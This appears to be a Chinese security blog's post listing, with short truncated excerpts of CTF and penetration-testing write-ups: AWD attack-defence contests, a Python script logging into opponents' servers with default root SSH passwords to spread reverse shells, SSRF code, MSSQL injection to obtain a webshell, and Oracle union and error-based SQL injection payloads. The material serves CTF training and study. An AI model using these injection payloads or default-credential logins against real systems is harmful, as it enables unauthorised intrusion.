2020年08月27日
AWD是什么Attack With Defence,简而言之就是你既是一个hacker,又是一个manager。比赛形式:一般就是一个ssh对应一个web或者pwn或者其他服务,然后flag若干分钟一轮,各队一般都有自己的初始分数,flag被拿会被拿走flag的队伍均分,主办方会对每个队伍的服务是否正常进行check,check不过就扣分,扣除的分值由服务check正常的队伍均分。AWD题目类型题目类型只了解web的哭了出题人自己写的或者修改的cms,附加了一些常见web漏洞。常见或者不常见的c
2020年08月27日
情景一 默认SSH密码批量反弹shell官方在给出服务器密码时,很有可能是默认的,需要赶快修改自己的密码并尝试能不能登陆别人的靶机#-*- coding:utf-8 -*-
import paramiko
ip = '192.168.1.137'
port = '22'
username = 'root'
passwd = &
2020年06月03日
网鼎杯玄武组题目,ssrf代码<?php
function check_inner_ip($url)
{
$match_result=preg_match('/^(http|https|gopher|dict)?:\/\/.*(\/)?.*$/',$url);
if (!$match_result)
{
2020年06月01日
前言本文主要通过一个案例来演示一下当MSSQL是DBA权限,且不知道路径的时候如何去获取WEBSHELL。当然这种方式对站库分离的无效。我测试的环境是在Win7 64位下,数据库是SQLServer 2000,IIS版本是7.5,程序是采用风讯的CMS。后台登录后有多处注入,因为这里是演示用注入获取WEBSHELL,因此就不考虑后台上传的情况了,只是用注入来实现。过程首先找到一个如下的注入点:http://192.168.232.138:81/manage/news/Newslist.aspx?
2020年05月22日
Union联合查询: order by 定字段 and 1=2 union select null,null..... from dual 然后一个一个去判断字段类型,方法如下 and 1=2 union select 'null',null...... from dual 返回正常,说明第一个字段是字符型,反之为数字型 第一个字段是字符型,判断第二个字段类型: and 1=2 union select 'null','null'
2020年05月22日
0x00 前言在oracle注入时候出现了数据库报错信息,可以优先选择报错注入,使用报错的方式将查询数据的结果带出到错误页面中。使用报错注入需要使用类似 1=[报错语句],1>[报错语句],使用比较运算符,这样的方式进行报错注入(MYSQL仅使用函数报错即可),类似mssql报错注入的方式。判断注入http://www.jsporcle.com/news.jsp?id=1 and (select count (*) from&nb
2020年05月18日
打开页面是这样的通过给的附件进行代码审计,发现有sql注入漏洞注入点为dbName参数,首先需要解决的问题是如何绕过 "jdbc:mysql://mysqldbserver:3306/" + dbName;找到jdbc的连接字符串参数文档,发现dbName后面加上?后面可以加任意参数,就不会影响正常的数据库连接也就是说dbName可以等于myapp?a=1..... ,a=1 后面可以写单引号来注入了,经过测试找到注入点myapp?a=1'&nb
2020年05月13日
#nginx1.18.0版本
#user nobody;
worker_processes 1;
#error_log logs/error.log;
#error_log logs/error.log notice;
#error_log logs/error.log info;
#pid  
2020年05月09日
搜索%04X,找到关键代码# encoding=utf-8
import hashlib
ctable = [
0x00, 0x61, 0x62, 0x63, 0x64, 0x65, 0x66, 0x67, 0x68, 0x69,
0x6A, 0x6B
2020年04月10日
修改成。zip打开后发现是apk,修改成apk,使用jeb3直接打开反编译输入EYG3QMCS可以执行flag.classarr = [102, 108, 97, 103, 0x7B, 0x77, 52, 110, 110, 52, 0x5F, 106, 52, 0x72, 0x5F, 109, 0x79,